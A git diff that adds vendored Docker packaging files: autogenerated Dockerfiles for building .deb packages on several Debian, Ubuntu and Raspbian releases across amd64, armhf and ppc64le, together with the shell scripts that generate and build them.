+# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM debian:stretch + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile new file mode 100644 index 0000000000..bcedb47b94 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM debian:wheezy-backports + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + +RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/* +RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh new file mode 100755 index 0000000000..765db5d8e9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh @@ -0,0 +1,149 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh debian-jessie +# to only update debian-jessie/Dockerfile +# or: ./generate.sh debian-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + + case "$from" in + debian:wheezy) + # add -backports, like our users have to + from+='-backports' + ;; + esac + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! + # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + if [ "$distro" = "debian" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + # allow replacing httpredir or deb mirror + ARG APT_MIRROR=deb.debian.org + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + EOF + + if [ "$suite" = "wheezy" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + EOF + fi + + echo "" >> "$version/Dockerfile" + fi + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + # packaging for "sd-journal.h" and libraries varies + case "$suite" in + precise|wheezy) ;; + jessie|trusty) packages+=( libsystemd-journal-dev );; + *) packages+=( libsystemd-dev );; + esac + + # debian wheezy & ubuntu precise do not have the right libseccomp libs + # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( + case "$suite" in + precise|wheezy|jessie|trusty) + packages=( "${packages[@]/libseccomp-dev}" ) + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor seccomp selinux" + ;; + esac + + + if [ "$suite" = 'precise' ]; then + # precise has a few package issues + + # - dh-systemd doesn't exist at all + packages=( "${packages[@]/dh-systemd}" ) + + # - libdevmapper-dev is missing critical structs (too old) + packages=( "${packages[@]/libdevmapper-dev}" ) + extraBuildTags+=' exclude_graphdriver_devicemapper' + + # - btrfs-tools is missing "ioctl.h" (too old), so it's useless + # (since kernels on precise are old too, just skip btrfs entirely) + packages=( "${packages[@]/btrfs-tools}" ) + extraBuildTags+=' exclude_graphdriver_btrfs' + fi + + if [ "$suite" = 'wheezy' ]; then + # pull a couple packages from backports explicitly + # (build failures otherwise) + backportsPackages=( btrfs-tools ) + for pkg in "${backportsPackages[@]}"; do + packages=( "${packages[@]/$pkg}" ) + done + echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + fi + + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile new file mode 100644 index 0000000000..aa027f83b3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM ubuntu:precise + +RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor git libapparmor-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..b03a853ed6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..af03f6226f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..5ac1edf1a4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile new file mode 100644 index 0000000000..a4ac781eb9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile @@ -0,0 +1,20 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh new file mode 100755 index 0000000000..e110a219ab --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh @@ -0,0 +1,158 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh debian-jessie +# to only update debian-jessie/Dockerfile +# or: ./generate.sh debian-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + + case "$from" in + raspbian:jessie) + from="resin/rpi-raspbian:jessie" + ;; + *) + from="armhf/$from" + ;; + esac + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! + # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then + cat >> "$version/Dockerfile" <<-'EOF' + # allow replacing httpredir or deb mirror + ARG APT_MIRROR=deb.debian.org + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + EOF + + if [ "$suite" = "wheezy" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + EOF + fi + + echo "" >> "$version/Dockerfile" + fi + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + # packaging for "sd-journal.h" and libraries varies + case "$suite" in + precise|wheezy) ;; + jessie|trusty) packages+=( libsystemd-journal-dev );; + *) packages+=( libsystemd-dev );; + esac + + # debian wheezy & ubuntu precise do not have the right libseccomp libs + # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( + case "$suite" in + precise|wheezy|jessie|trusty) + packages=( "${packages[@]/libseccomp-dev}" ) + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor seccomp selinux" + ;; + esac + + + if [ "$suite" = 'precise' ]; then + # precise has a few package issues + + # - dh-systemd doesn't exist at all + packages=( "${packages[@]/dh-systemd}" ) + + # - libdevmapper-dev is missing critical structs (too old) + packages=( "${packages[@]/libdevmapper-dev}" ) + extraBuildTags+=' exclude_graphdriver_devicemapper' + + # - btrfs-tools is missing "ioctl.h" (too old), so it's useless + # (since kernels on precise are old too, just skip btrfs entirely) + packages=( "${packages[@]/btrfs-tools}" ) + extraBuildTags+=' exclude_graphdriver_btrfs' + fi + + if [ "$suite" = 'wheezy' ]; then + # pull a couple packages from backports explicitly + # (build failures otherwise) + backportsPackages=( btrfs-tools ) + for pkg in "${backportsPackages[@]}"; do + packages=( "${packages[@]/$pkg}" ) + done + echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + fi + + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + if [ "$distro" == 'raspbian' ]; + then + cat <> "$version/Dockerfile" +# GOARM is the ARM architecture version which is unrelated to the above Golang version +ENV GOARM 6 +EOF + fi + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile new file mode 100644 index 0000000000..4dbfd093d8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM resin/rpi-raspbian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +# GOARM is the ARM architecture version which is unrelated to the above Golang version +ENV GOARM 6 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..b36c1dac71 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM armhf/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..b5e55ad2dd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM armhf/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..69c2e7f2d4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM armhf/ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh new file mode 100755 index 0000000000..7d22e8c47f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh new file mode 100755 index 0000000000..0e20b9c4b5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh @@ -0,0 +1,103 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-xenial +# to only update ubuntu-xenial/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="ppc64le/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! + # + + FROM $from + + EOF + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + + case "$suite" in + trusty) + packages+=( libsystemd-journal-dev ) + ;; + *) + # libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so" + packages+=( libseccomp-dev ) + packages+=( libsystemd-dev ) + ;; + esac + + # buildtags + case "$suite" in + # trusty has no seccomp package + trusty) + runcBuildTags="apparmor selinux" + ;; + # ppc64le support was backported into libseccomp 2.2.3-2, + # so enable seccomp by default + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor seccomp selinux" + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile" + echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..4182d683b0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! +# + +FROM ppc64le/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..f1521db72f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! +# + +FROM ppc64le/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile 